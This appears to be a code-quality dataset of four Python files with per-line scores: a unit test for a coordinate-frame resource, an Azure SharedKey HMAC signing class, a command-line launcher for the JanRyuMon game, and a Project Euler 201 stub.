# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest from intern.resource.boss.resource import CoordinateFrameResource class TestCoordFrameResource(unittest.TestCase): def setUp(self): self.cf = CoordinateFrameResource('frame') def test_not_valid_volume(self): self.assertFalse(self.cf.valid_volume()) def test_get_route(self): self.assertEqual( '{}'.format(self.cf.name), self.cf.get_route()) def test_get_list_route(self): self.assertEqual('', self.cf.get_list_route()) def test_voxel_unit_setter(self): exp = 'millimeters' self.cf.voxel_unit = exp self.assertEqual(exp, self.cf.voxel_unit) def test_validate_voxel_units_nm(self): exp = 'nanometers' self.assertEqual(exp, self.cf.validate_voxel_units(exp)) def test_validate_voxel_units_micro(self): exp = 'micrometers' self.assertEqual(exp, self.cf.validate_voxel_units(exp)) def test_validate_voxel_units_mm(self): exp = 'millimeters' self.assertEqual(exp, self.cf.validate_voxel_units(exp)) def test_validate_voxel_units_cm(self): exp = 'centimeters' self.assertEqual(exp, self.cf.validate_voxel_units(exp)) def test_validate_voxel_units_bad(self): with self.assertRaises(ValueError): self.cf.validate_voxel_units('centimet')
[ "# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at\n", "#\n", "# http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "\n", "import unittest\n", "from intern.resource.boss.resource import CoordinateFrameResource\n", "\n", "class TestCoordFrameResource(unittest.TestCase):\n", " def setUp(self):\n", " self.cf = CoordinateFrameResource('frame')\n", "\n", " def test_not_valid_volume(self):\n", " self.assertFalse(self.cf.valid_volume())\n", "\n", " def test_get_route(self):\n", " self.assertEqual(\n", " '{}'.format(self.cf.name), self.cf.get_route())\n", "\n", " def test_get_list_route(self):\n", " self.assertEqual('', self.cf.get_list_route())\n", "\n", " def test_voxel_unit_setter(self):\n", " exp = 'millimeters'\n", " self.cf.voxel_unit = exp\n", " self.assertEqual(exp, self.cf.voxel_unit)\n", "\n", " def test_validate_voxel_units_nm(self):\n", " exp = 'nanometers'\n", " self.assertEqual(exp, self.cf.validate_voxel_units(exp))\n", "\n", " def test_validate_voxel_units_micro(self):\n", " exp = 'micrometers'\n", " self.assertEqual(exp, self.cf.validate_voxel_units(exp))\n", "\n", " def test_validate_voxel_units_mm(self):\n", " exp = 'millimeters'\n", " self.assertEqual(exp, self.cf.validate_voxel_units(exp))\n", "\n", " def test_validate_voxel_units_cm(self):\n", " exp = 'centimeters'\n", " self.assertEqual(exp, self.cf.validate_voxel_units(exp))\n", "\n", " def test_validate_voxel_units_bad(self):\n", " with 
self.assertRaises(ValueError):\n", " self.cf.validate_voxel_units('centimet')\n", "\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02040816326530612, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1 ]
56
0.018222
false
# coding=utf-8 #------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. #-------------------------------------------------------------------------- import time import keyring import ast import base64 import hmac import hashlib import datetime import requests from requests.auth import AuthBase from msrest.authentication import Authentication from msrest import Serializer from msrest.serialization import TZ_UTC try: from urlparse import urlparse, parse_qs except ImportError: from urllib.parse import urlparse, parse_qs class SharedKeyAuth(AuthBase): headers_to_sign = [ 'content-encoding', 'content-language', 'content-length', 'content-md5', 'content-type', 'date', 'if-modified-since', 'if-match', 'if-none-match', 'if-unmodified-since', 'range'] def __init__(self, header, account_name, key): self._header = header self._account_name = account_name self._key = key def __call__(self, request): if not request.headers.get('ocp-date'): now = datetime.datetime.utcnow() now = now.replace(tzinfo=TZ_UTC) request.headers['ocp-date'] = Serializer.serialize_rfc(now) url = urlparse(request.url) uri_path = url.path uri_path = uri_path.replace('%5C', '/') uri_path = uri_path.replace('%2F', '/') # method to sign string_to_sign = request.method + '\n' # get headers to sign request_header_dict = { key.lower(): val for key, val in request.headers.items() if val} request_headers = [ str(request_header_dict.get(x, '')) for x in self.headers_to_sign] string_to_sign += '\n'.join(request_headers) + '\n' # get ocp- header to sign ocp_headers = [] for name, value in request.headers.items(): if 'ocp-' in name and value: ocp_headers.append((name.lower(), value)) for name, value in sorted(ocp_headers): string_to_sign += "{}:{}\n".format(name, value) # get account_name and uri path to sign string_to_sign += 
"/{}{}".format(self._account_name, uri_path) # get query string to sign if it is not table service query_to_sign = parse_qs(url.query) for name in sorted(query_to_sign.keys()): value = query_to_sign[name][0] if value: string_to_sign += "\n{}:{}".format(name, value) # sign the request auth_string = "SharedKey {}:{}".format( self._account_name, self._sign_string(string_to_sign)) request.headers[self._header] = auth_string return request def _sign_string(self, string_to_sign): _key = self._key.encode('utf-8') string_to_sign = string_to_sign.encode('utf-8') try: key = base64.b64decode(_key) except TypeError: raise ValueError("Invalid key value: {}".format(self._key)) signed_hmac_sha256 = hmac.HMAC(key, string_to_sign, hashlib.sha256) digest = signed_hmac_sha256.digest() return base64.b64encode(digest).decode('utf-8') class SharedKeyCredentials(Authentication): def __init__(self, account_name, key): super(SharedKeyCredentials, self).__init__() self.auth = SharedKeyAuth(self.header, account_name, key) def signed_session(self): session = super(SharedKeyCredentials, self).signed_session() session.auth = self.auth return session
[ "# coding=utf-8\n", "#-------------------------------------------------------------------------\n", "# Copyright (c) Microsoft Corporation. All rights reserved.\n", "# Licensed under the MIT License. See License.txt in the project root for\n", "# license information.\n", "#--------------------------------------------------------------------------\n", "\n", "import time\n", "import keyring\n", "import ast\n", "import base64\n", "import hmac\n", "import hashlib\n", "import datetime\n", "\n", "import requests\n", "from requests.auth import AuthBase\n", "from msrest.authentication import Authentication\n", "from msrest import Serializer\n", "from msrest.serialization import TZ_UTC\n", "\n", "try:\n", " from urlparse import urlparse, parse_qs\n", "\n", "except ImportError:\n", " from urllib.parse import urlparse, parse_qs\n", "\n", "class SharedKeyAuth(AuthBase):\n", "\n", " headers_to_sign = [\n", " 'content-encoding',\n", " 'content-language',\n", " 'content-length',\n", " 'content-md5',\n", " 'content-type',\n", " 'date',\n", " 'if-modified-since',\n", " 'if-match',\n", " 'if-none-match',\n", " 'if-unmodified-since',\n", " 'range']\n", "\n", " def __init__(self, header, account_name, key):\n", " self._header = header\n", " self._account_name = account_name\n", " self._key = key\n", "\n", " def __call__(self, request):\n", "\n", " if not request.headers.get('ocp-date'):\n", " now = datetime.datetime.utcnow()\n", " now = now.replace(tzinfo=TZ_UTC)\n", " request.headers['ocp-date'] = Serializer.serialize_rfc(now)\n", "\n", " url = urlparse(request.url)\n", " uri_path = url.path\n", " uri_path = uri_path.replace('%5C', '/')\n", " uri_path = uri_path.replace('%2F', '/')\n", "\n", " # method to sign\n", " string_to_sign = request.method + '\\n'\n", "\n", " # get headers to sign\n", " request_header_dict = {\n", " key.lower(): val for key, val in request.headers.items() if val}\n", "\n", " request_headers = [\n", " str(request_header_dict.get(x, '')) for x in 
self.headers_to_sign]\n", "\n", " string_to_sign += '\\n'.join(request_headers) + '\\n'\n", "\n", " # get ocp- header to sign\n", " ocp_headers = []\n", " for name, value in request.headers.items():\n", " if 'ocp-' in name and value:\n", " ocp_headers.append((name.lower(), value))\n", "\n", " for name, value in sorted(ocp_headers):\n", " string_to_sign += \"{}:{}\\n\".format(name, value)\n", "\n", " # get account_name and uri path to sign\n", " string_to_sign += \"/{}{}\".format(self._account_name, uri_path)\n", "\n", " # get query string to sign if it is not table service\n", " query_to_sign = parse_qs(url.query)\n", "\n", " for name in sorted(query_to_sign.keys()):\n", " value = query_to_sign[name][0]\n", " if value:\n", " string_to_sign += \"\\n{}:{}\".format(name, value)\n", "\n", " # sign the request\n", " auth_string = \"SharedKey {}:{}\".format(\n", " self._account_name, self._sign_string(string_to_sign))\n", "\n", " request.headers[self._header] = auth_string\n", "\n", " return request\n", "\n", " def _sign_string(self, string_to_sign):\n", "\n", " _key = self._key.encode('utf-8')\n", " string_to_sign = string_to_sign.encode('utf-8')\n", "\n", " try:\n", " key = base64.b64decode(_key)\n", " except TypeError:\n", " raise ValueError(\"Invalid key value: {}\".format(self._key))\n", "\n", " signed_hmac_sha256 = hmac.HMAC(key, string_to_sign, hashlib.sha256)\n", " digest = signed_hmac_sha256.digest()\n", "\n", " return base64.b64encode(digest).decode('utf-8')\n", "\n", "\n", "class SharedKeyCredentials(Authentication):\n", "\n", " def __init__(self, account_name, key):\n", " super(SharedKeyCredentials, self).__init__()\n", " self.auth = SharedKeyAuth(self.header, account_name, key)\n", " \n", " def signed_session(self):\n", "\n", " session = super(SharedKeyCredentials, self).signed_session()\n", " session.auth = self.auth\n", "\n", " return session\n", " " ]
[ 0, 0.013333333333333334, 0, 0, 0, 0.013157894736842105, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0.5 ]
128
0.005928
false
# JRM Launcher - Launch JanRyuMon without the need of Internet Explorer and ActiveX # Copyright (C) Mino <mino@minomino.org> # This file is part of JRM Launcher. # JRM Launcher is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # JRM Launcher is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with JRM Launcher. If not, see <http://www.gnu.org/licenses/>. import os import os.path import sys import argparse import subprocess import jrm VERSION = "0.2.3" # Initializes and returns the command-line argument parser object. def init_parser(): parser = argparse.ArgumentParser(description= \ "Launch JRM without having to use IE and ActiveX. Read the README for detailed information.") parser.add_argument("-s", "--skip", action="store_true", \ help="If set, the PlayNC launcher is skipped altogether and launches JRM directly.") parser.add_argument("-alt", "--alternative", action="store_true", \ help="Alternative way of launching JRM. Only works with if skipping launcher.") parser.add_argument("-u", "--username", help="Your JRM username.") parser.add_argument("-p", "--password", help="Your JRM password.") parser.add_argument("-nc", "--ncpath", help="Path to the NCLoader folder.") parser.add_argument("-pnc", "--pncpath", help="Path to the PlayNC folder.") parser.add_argument("-jrm", "--jrmpath", help="Path to the JanRyuMon folder.") return parser # Set paths needed if searching for any of the folders automatically. def get_environ(): program_files = os.environ["ProgramFiles"] # Should point to the x86 folder on both 32-bit and 64-bit. 
user_profile = os.path.join(os.environ['HomeDrive'], os.environ['HomePath']) return (program_files, user_profile) # Attempts to find all the necessary files and folders and returns them. def get_paths(args): program_files, user_profile = get_environ() keygen_path = "" launcher_path = "" jrm_folder_path = "" # NCLoader if not args.ncpath: w7_appdata = user_profile + "\\AppData\\LocalLow\\" xp_appdata = user_profile + "\\Application Data\\" if os.path.exists(w7_appdata + "NCLoader\\NCKeygen.dll"): nc_folder = w7_appdata + "NCLoader" elif os.path.exists(xp_appdata + "NCLoader\\NCKeygen.dll"): nc_folder = xp_appdata + "NCLoader" else: print("ERROR: Could not locate the NCSoft key generator automatically.") input() exit(1) keygen_path = nc_folder + "\\NCKeygen.dll" else: keygen_path = args.ncpath + "\\NCKeygen.dll" if not args.skip: # PlayNC. Only if not skipped. if not args.pncpath: pncl_folder = "C:\\PlayNC\\PlayNCLauncher" if not os.path.exists(pncl_folder + "\\playnclauncher.exe"): print("ERROR: Could not locate the PlayNC launcher automatically.") input() exit(1) launcher_path = pncl_folder + "\\playnclauncher.exe" else: launcher_path = args.pncpath + "\\PlayNCLauncher\\playnclauncher.exe" if args.skip: # JRM. Only if skipped. if not args.jrmpath: if os.path.exists("{0}\\JanRyuMon\\JanRyuMon.exe".format(program_files)): jrm_folder = "{0}\\JanRyuMon".format(program_files) elif os.path.exists("{0}\\PlayNC\\JanRyuMon\\JanRyuMon.exe".format(user_profile)): jrm_folder = "{0}\\PlayNC\\JanRyuMon".format(user_profile) else: print("ERROR: Could not locate JanRyuMon automatically.") input() exit(1) jrm_folder_path = jrm_folder else: jrm_folder_path = args.jrmpath return (keygen_path, launcher_path, jrm_folder_path) # Prompt username and password if necessary, then return them. 
def get_login(args): if not args.username: username = input("Username: ") else: username = args.username if not args.password: password = input("Password: ") else: password = args.password return (username, password) # Initialize keygen and get unique ID. def get_ukey(keygen_path): keygen = jrm.NcKeygen(keygen_path) ukey = keygen.get_key() if not ukey: print("ERROR: Failed to get a unique key.") input() exit(1) return ukey # Initialize session object and get session ID. def get_session_id(username, password, ukey): session = jrm.JrmSession(ukey) if not session.login(username, password): print("ERROR: Failed to get a session ID. Incorrect username/password?") input() exit(1) return session.session_id def launch_jrm(jrm_folder_path, session_id, alternative=False): # Launch JRM directly. jrm_params = ('{0}\\JanRyuMon.exe'.format(jrm_folder_path), '/SessKey:"{0}"'.format(session_id), '/ChannelGroupIndex:"-1"', '/ServerAddr:"106.186.45.130"', '/StartGameID:"JanRyuMon"', '/RepositorySub:"localhost"', '/GamePath:"{0}"'.format(jrm_folder_path)) if alternative: return os.execv('{0}\\JanRyuMon.exe'.format(jrm_folder_path), jrm_params) else: return subprocess.Popen(" ".join(jrm_params), shell=False) def launch_launcher(launcher_path, session_id): # Launch the launcher. launcher_params = (launcher_path, '/GameID:"PlayNCLauncher"', '/ServiceFolder:"PlayNC"', '/SetupMng:"NCSetupMng"', '/LUpdateAddr:"uis.plaync.jp/UniUpdTool"', '/FileUpdateAddr:"http://uniupdate.plaync.jp/UniUpdTool/system"', '/StartGameID:"JanRyuMon"', '/SessKey:"{0}"'.format(session_id)) return subprocess.Popen(" ".join(launcher_params), shell=False) if __name__ == "__main__": print("JanRyuMon Launcher v{0}".format(VERSION)) print("by Mino - http://www.minomino.org\n") # Initialize command-line argument parser and parse if anything to parse. parser = init_parser() if len(sys.argv) > 1: args = parser.parse_args(sys.argv[1:]) else: args = parser.parse_args([]) # Get necessary paths. 
if not args.ncpath and not args.pncpath and not args.jrmpath: print("Trying to find paths automatically...") elif args.ncpath and args.pncpath and args.jrmpath: print("Using specified paths...") else: print("Using specified path(s). Trying to find the remaining...") keygen_path, launcher_path, jrm_folder_path = get_paths(args) # Get login info. if args.username and args.password: print("Using provided username and password.") username, password = get_login(args) # Get unique key print("Generating unique key...") ukey = get_ukey(keygen_path) # Get session ID print("Logging in as '{0}'...".format(username)) session_id = get_session_id(username, password, ukey) # Launch either launcher or JRM. if not args.skip: print("Starting the PlayNC launcher...") launch_launcher(launcher_path, session_id) else: print("Skipping the PlayNC launcher. Starting JanRyuMon...") if args.alternative: print("Launching with the alternative method...") launch_jrm(jrm_folder_path, session_id, args.alternative) else: launch_jrm(jrm_folder_path, session_id) print("\nGood luck, fellow lesbian.") input("Press enter to close this window.")
[ "# JRM Launcher - Launch JanRyuMon without the need of Internet Explorer and ActiveX\n", "# Copyright (C) Mino <mino@minomino.org>\n", "\n", "# This file is part of JRM Launcher.\n", "\n", "# JRM Launcher is free software: you can redistribute it and/or modify\n", "# it under the terms of the GNU General Public License as published by\n", "# the Free Software Foundation, either version 3 of the License, or\n", "# (at your option) any later version.\n", "\n", "# JRM Launcher is distributed in the hope that it will be useful,\n", "# but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "# GNU General Public License for more details.\n", "\n", "# You should have received a copy of the GNU General Public License\n", "# along with JRM Launcher. If not, see <http://www.gnu.org/licenses/>.\n", "\n", "\n", "import os\n", "import os.path\n", "import sys\n", "import argparse\n", "import subprocess\n", "import jrm\n", "\n", "VERSION = \"0.2.3\"\n", "\n", "# Initializes and returns the command-line argument parser object.\n", "def init_parser():\n", " parser = argparse.ArgumentParser(description= \\\n", " \"Launch JRM without having to use IE and ActiveX. Read the README for detailed information.\")\n", " parser.add_argument(\"-s\", \"--skip\", action=\"store_true\", \\\n", " help=\"If set, the PlayNC launcher is skipped altogether and launches JRM directly.\")\n", " parser.add_argument(\"-alt\", \"--alternative\", action=\"store_true\", \\\n", " help=\"Alternative way of launching JRM. 
Only works with if skipping launcher.\")\n", " parser.add_argument(\"-u\", \"--username\", help=\"Your JRM username.\")\n", " parser.add_argument(\"-p\", \"--password\", help=\"Your JRM password.\")\n", " parser.add_argument(\"-nc\", \"--ncpath\", help=\"Path to the NCLoader folder.\")\n", " parser.add_argument(\"-pnc\", \"--pncpath\", help=\"Path to the PlayNC folder.\")\n", " parser.add_argument(\"-jrm\", \"--jrmpath\", help=\"Path to the JanRyuMon folder.\")\n", " \n", " return parser\n", "\n", "# Set paths needed if searching for any of the folders automatically.\n", "def get_environ():\n", " program_files = os.environ[\"ProgramFiles\"] # Should point to the x86 folder on both 32-bit and 64-bit.\n", " user_profile = os.path.join(os.environ['HomeDrive'], os.environ['HomePath'])\n", " \n", " return (program_files, user_profile)\n", "\n", "# Attempts to find all the necessary files and folders and returns them.\n", "def get_paths(args):\n", " \n", " program_files, user_profile = get_environ()\n", " keygen_path = \"\"\n", " launcher_path = \"\"\n", " jrm_folder_path = \"\"\n", " \n", " # NCLoader\n", " if not args.ncpath:\n", " w7_appdata = user_profile + \"\\\\AppData\\\\LocalLow\\\\\"\n", " xp_appdata = user_profile + \"\\\\Application Data\\\\\"\n", " if os.path.exists(w7_appdata + \"NCLoader\\\\NCKeygen.dll\"):\n", " nc_folder = w7_appdata + \"NCLoader\"\n", " elif os.path.exists(xp_appdata + \"NCLoader\\\\NCKeygen.dll\"):\n", " nc_folder = xp_appdata + \"NCLoader\"\n", " else:\n", " print(\"ERROR: Could not locate the NCSoft key generator automatically.\")\n", " input()\n", " exit(1)\n", " keygen_path = nc_folder + \"\\\\NCKeygen.dll\"\n", " else:\n", " keygen_path = args.ncpath + \"\\\\NCKeygen.dll\"\n", " \n", " if not args.skip:\n", " # PlayNC. 
Only if not skipped.\n", " if not args.pncpath:\n", " pncl_folder = \"C:\\\\PlayNC\\\\PlayNCLauncher\"\n", " if not os.path.exists(pncl_folder + \"\\\\playnclauncher.exe\"):\n", " print(\"ERROR: Could not locate the PlayNC launcher automatically.\")\n", " input()\n", " exit(1)\n", " launcher_path = pncl_folder + \"\\\\playnclauncher.exe\"\n", " else:\n", " launcher_path = args.pncpath + \"\\\\PlayNCLauncher\\\\playnclauncher.exe\"\n", " \n", " if args.skip:\n", " # JRM. Only if skipped.\n", " if not args.jrmpath:\n", " if os.path.exists(\"{0}\\\\JanRyuMon\\\\JanRyuMon.exe\".format(program_files)):\n", " jrm_folder = \"{0}\\\\JanRyuMon\".format(program_files)\n", " elif os.path.exists(\"{0}\\\\PlayNC\\\\JanRyuMon\\\\JanRyuMon.exe\".format(user_profile)):\n", " jrm_folder = \"{0}\\\\PlayNC\\\\JanRyuMon\".format(user_profile)\n", " else:\n", " print(\"ERROR: Could not locate JanRyuMon automatically.\")\n", " input()\n", " exit(1)\n", " jrm_folder_path = jrm_folder\n", " else:\n", " jrm_folder_path = args.jrmpath\n", " \n", " return (keygen_path, launcher_path, jrm_folder_path)\n", "\n", "# Prompt username and password if necessary, then return them.\n", "def get_login(args):\n", " if not args.username:\n", " username = input(\"Username: \")\n", " else:\n", " username = args.username\n", " if not args.password:\n", " password = input(\"Password: \")\n", " else:\n", " password = args.password\n", " \n", " return (username, password)\n", "\n", "# Initialize keygen and get unique ID.\n", "def get_ukey(keygen_path):\n", " keygen = jrm.NcKeygen(keygen_path)\n", " ukey = keygen.get_key()\n", " if not ukey:\n", " print(\"ERROR: Failed to get a unique key.\")\n", " input()\n", " exit(1)\n", " \n", " return ukey\n", " \n", "# Initialize session object and get session ID.\n", "def get_session_id(username, password, ukey):\n", " session = jrm.JrmSession(ukey)\n", " if not session.login(username, password):\n", " print(\"ERROR: Failed to get a session ID. 
Incorrect username/password?\")\n", " input()\n", " exit(1)\n", " \n", " return session.session_id\n", "\n", "\n", " \n", "def launch_jrm(jrm_folder_path, session_id, alternative=False):\n", " # Launch JRM directly.\n", " jrm_params = ('{0}\\\\JanRyuMon.exe'.format(jrm_folder_path),\n", " '/SessKey:\"{0}\"'.format(session_id),\n", " '/ChannelGroupIndex:\"-1\"',\n", " '/ServerAddr:\"106.186.45.130\"',\n", " '/StartGameID:\"JanRyuMon\"',\n", " '/RepositorySub:\"localhost\"',\n", " '/GamePath:\"{0}\"'.format(jrm_folder_path))\n", " \n", " if alternative:\n", " return os.execv('{0}\\\\JanRyuMon.exe'.format(jrm_folder_path), jrm_params)\n", " else:\n", " return subprocess.Popen(\" \".join(jrm_params), shell=False)\n", " \n", "def launch_launcher(launcher_path, session_id):\n", " # Launch the launcher.\n", " launcher_params = (launcher_path,\n", " '/GameID:\"PlayNCLauncher\"',\n", " '/ServiceFolder:\"PlayNC\"',\n", " '/SetupMng:\"NCSetupMng\"',\n", " '/LUpdateAddr:\"uis.plaync.jp/UniUpdTool\"',\n", " '/FileUpdateAddr:\"http://uniupdate.plaync.jp/UniUpdTool/system\"',\n", " '/StartGameID:\"JanRyuMon\"',\n", " '/SessKey:\"{0}\"'.format(session_id))\n", " \n", " return subprocess.Popen(\" \".join(launcher_params), shell=False)\n", "\n", "if __name__ == \"__main__\":\n", " print(\"JanRyuMon Launcher v{0}\".format(VERSION))\n", " print(\"by Mino - http://www.minomino.org\\n\")\n", " \n", " # Initialize command-line argument parser and parse if anything to parse.\n", " parser = init_parser()\n", " if len(sys.argv) > 1:\n", " args = parser.parse_args(sys.argv[1:])\n", " else:\n", " args = parser.parse_args([])\n", " \n", " # Get necessary paths.\n", " if not args.ncpath and not args.pncpath and not args.jrmpath:\n", " print(\"Trying to find paths automatically...\")\n", " elif args.ncpath and args.pncpath and args.jrmpath:\n", " print(\"Using specified paths...\")\n", " else:\n", " print(\"Using specified path(s). 
Trying to find the remaining...\")\n", " keygen_path, launcher_path, jrm_folder_path = get_paths(args)\n", " \n", " # Get login info.\n", " if args.username and args.password:\n", " print(\"Using provided username and password.\")\n", " username, password = get_login(args)\n", " \n", " # Get unique key\n", " print(\"Generating unique key...\")\n", " ukey = get_ukey(keygen_path)\n", " \n", " # Get session ID\n", " print(\"Logging in as '{0}'...\".format(username))\n", " session_id = get_session_id(username, password, ukey)\n", " \n", " # Launch either launcher or JRM.\n", " if not args.skip:\n", " print(\"Starting the PlayNC launcher...\")\n", " launch_launcher(launcher_path, session_id)\n", " else:\n", " print(\"Skipping the PlayNC launcher. Starting JanRyuMon...\")\n", " if args.alternative:\n", " print(\"Launching with the alternative method...\")\n", " launch_jrm(jrm_folder_path, session_id, args.alternative)\n", " else:\n", " launch_jrm(jrm_folder_path, session_id)\n", " \n", " \n", " print(\"\\nGood luck, fellow lesbian.\")\n", " input(\"Press enter to close this window.\")\n", "\n", "\n", "\n", "\n", " " ]
[ 0.011904761904761904, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.05263157894736842, 0.038461538461538464, 0.018691588785046728, 0.015873015873015872, 0.009174311926605505, 0.013888888888888888, 0.009615384615384616, 0, 0, 0, 0, 0.012048192771084338, 0.2, 0, 0, 0, 0.05263157894736842, 0.018691588785046728, 0.012345679012345678, 0.2, 0, 0, 0, 0.047619047619047616, 0.2, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0.011904761904761904, 0, 0, 0, 0, 0.012195121951219513, 0.2, 0, 0, 0, 0.011627906976744186, 0, 0.010526315789473684, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0.1111111111111111, 0, 0, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0.1111111111111111, 0, 0.2, 0, 0.021739130434782608, 0, 0, 0.012345679012345678, 0, 0, 0.1111111111111111, 0, 0, 0, 0.1111111111111111, 0.015625, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0.012195121951219513, 0, 0, 0.2, 0.020833333333333332, 0, 0, 0, 0, 0, 0, 0.011235955056179775, 0, 0, 0.2, 0, 0, 0.037037037037037035, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0.2, 0, 0, 0, 0.2, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0.2, 0.023809523809523808, 0, 0, 0, 0, 0, 0.75 ]
221
0.025364
false
# -*- coding: utf-8 -*- # ProjectEuler/src/python/problem201.py # # Subsets with a unique sum # ========================= # Published on Saturday, 5th July 2008, 02:00 pm # # For any set A of numbers, let sum(A) be the sum of the elements of A. # Consider the set B = {1,3,6,8,10,11}. There are 20 subsets of B containing # three elements, and their sums are: sum({1,3,6}) = 10, sum({1,3,8}) = 12, # sum({1,3,10}) = 14, sum({1,3,11}) = 15, sum({1,6,8}) = 15, sum({1,6,10}) = # 17, sum({1,6,11}) = 18, sum({1,8,10}) = 19, sum({1,8,11}) = 20, # sum({1,10,11}) = 22, sum({3,6,8}) = 17, sum({3,6,10}) = 19, sum({3,6,11}) # = 20, sum({3,8,10}) = 21, sum({3,8,11}) = 22, sum({3,10,11}) = 24, # sum({6,8,10}) = 24, sum({6,8,11}) = 25, sum({6,10,11}) = 27, # sum({8,10,11}) = 29. Some of these sums occur more than once, others are # unique. For a set A, let U(A,k) be the set of unique sums of k-element # subsets of A, in our example we find U(B,3) = {10,12,14,18,21,25,27,29} and # sum(U(B,3)) = 156. Now consider the 100-element set S = {12, 22, ... , 1002}. # S has 100891344545564193334812497256 50-element subsets. Determine the sum of # all integers which are the sum of exactly one of the 50-element subsets of S, # i.e. find sum(U(S,50)). import projecteuler as pe def main(): pass if __name__ == "__main__": main()
[ "# -*- coding: utf-8 -*-\n", "# ProjectEuler/src/python/problem201.py\n", "#\n", "# Subsets with a unique sum\n", "# =========================\n", "# Published on Saturday, 5th July 2008, 02:00 pm\n", "#\n", "# For any set A of numbers, let sum(A) be the sum of the elements of A.\n", "# Consider the set B = {1,3,6,8,10,11}. There are 20 subsets of B containing\n", "# three elements, and their sums are: sum({1,3,6}) = 10, sum({1,3,8}) = 12,\n", "# sum({1,3,10}) = 14, sum({1,3,11}) = 15, sum({1,6,8}) = 15, sum({1,6,10}) =\n", "# 17, sum({1,6,11}) = 18, sum({1,8,10}) = 19, sum({1,8,11}) = 20,\n", "# sum({1,10,11}) = 22, sum({3,6,8}) = 17, sum({3,6,10}) = 19, sum({3,6,11})\n", "# = 20, sum({3,8,10}) = 21, sum({3,8,11}) = 22, sum({3,10,11}) = 24,\n", "# sum({6,8,10}) = 24, sum({6,8,11}) = 25, sum({6,10,11}) = 27,\n", "# sum({8,10,11}) = 29. Some of these sums occur more than once, others are\n", "# unique. For a set A, let U(A,k) be the set of unique sums of k-element\n", "# subsets of A, in our example we find U(B,3) = {10,12,14,18,21,25,27,29} and\n", "# sum(U(B,3)) = 156. Now consider the 100-element set S = {12, 22, ... , 1002}.\n", "# S has 100891344545564193334812497256 50-element subsets. Determine the sum of\n", "# all integers which are the sum of exactly one of the 50-element subsets of S,\n", "# i.e. find sum(U(S,50)).\n", "\n", "import projecteuler as pe\n", "\n", "def main():\n", " pass\n", "\n", "if __name__ == \"__main__\":\n", " main()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0.037037037037037035, 0 ]
30
0.004012
false
